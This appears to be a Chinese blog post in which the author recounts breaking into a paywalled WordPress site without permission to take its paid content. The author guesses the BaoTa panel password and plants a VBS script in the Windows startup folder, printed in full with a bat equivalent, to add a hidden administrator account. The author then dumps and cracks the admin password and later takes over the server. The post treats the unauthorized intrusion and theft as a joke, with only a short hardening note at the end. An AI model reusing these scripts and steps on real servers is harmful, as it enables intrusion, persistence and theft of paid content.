---

0x00

某日，宿舍兄嘚神秘兮兮发过来一条链接，告诉我是个好东西，点开一看，额。。。

skr狠人，我只想说这样的资源请多来点，可是在存资源的过程中发现，该站开启了会员付费查看，这就很不开心了，作为一个苦逼的写代码的，我怎么可能有钱买这种东西呢！于是开始对该站进行渗透，毕竟心心念的小姐姐还在里面。

0x01

翻到网站最底部，硕大的wordpress映入眼帘，wp站没跑了

首先wpsacn扫一波：

Wordpress最新版本，也没装什么值得利用的插件，主题的代码审计小菜鸡我也审不出来什么东西，对管理员用户爆破了一阵子也没结果。

换个思路开始扫描端口：

竟然开着个不寻常的8888端口，直接访问发现是一种服务器管理面板——宝塔面板：

试了试弱口令admin/admin，果然是进不去的，而且密码一旦错误，第二次尝试就需要输入验证码，打开burp的手微微颤抖，爆破是不太可能了，正当我双目无神打算换个方向渗透的时候，室友大喊：RNG牛X！666！，然后我鬼使神差的密码输入了admin666，然后登陆进去了。。。。。。有时候吧，渗透这事它随缘。

进去后是这样的：

随便翻了翻这个面板，发现是台Windows server，而且该面板权限极其之大，甚至能够往系统目录上传文件。

这里补充一下小知识：

windows服务器启动项目录

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

如果可以上传的话，是可以直接写入vbs脚本然后坐等管理员连接服务器脚本运行直接提权的。

提权脚本如下：

				   	set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","用户名") '建立用户
od.SetPassword "密码" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/用户名 ",user) '得到用户
oe.add os&"/用户名 "
				   	

同样也可以写bat批处理：

				   	net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
				   	

通过查看面板日志我发现管理员一直很频繁的登陆宝塔界面进行维护等操作。

于是我就放心的上传了vbs，之所以选择vbs是因为bat批处理在运行的时候会有一个窗口一闪而过，容易引起管理员察觉。上传完脚本坐等提权的我开始翻面板里边的其他组件：

直接进入数据库，连密码都不用（再次感叹这个面板的权限之大），拿到管理员密码直接去somd5解密：

我为什么还要去找网站的后台密码呢？没错，我根本就是冲着资源来的。

get~~~

由于管理员不知什么时候会登陆，所以我搬运完资源就暂时搁置了这个站，今天想起来了直接远程，服务器get！

修复建议：尽快修改弱口令，最好不要再使用这些一键管理面板，非要使用的话，可以设置白名单连接，绑定ip或ip段，设置好文件夹权限，linux下使用www用户组，修改宝塔面板的端口为10000-65535之间的任意不常用端口。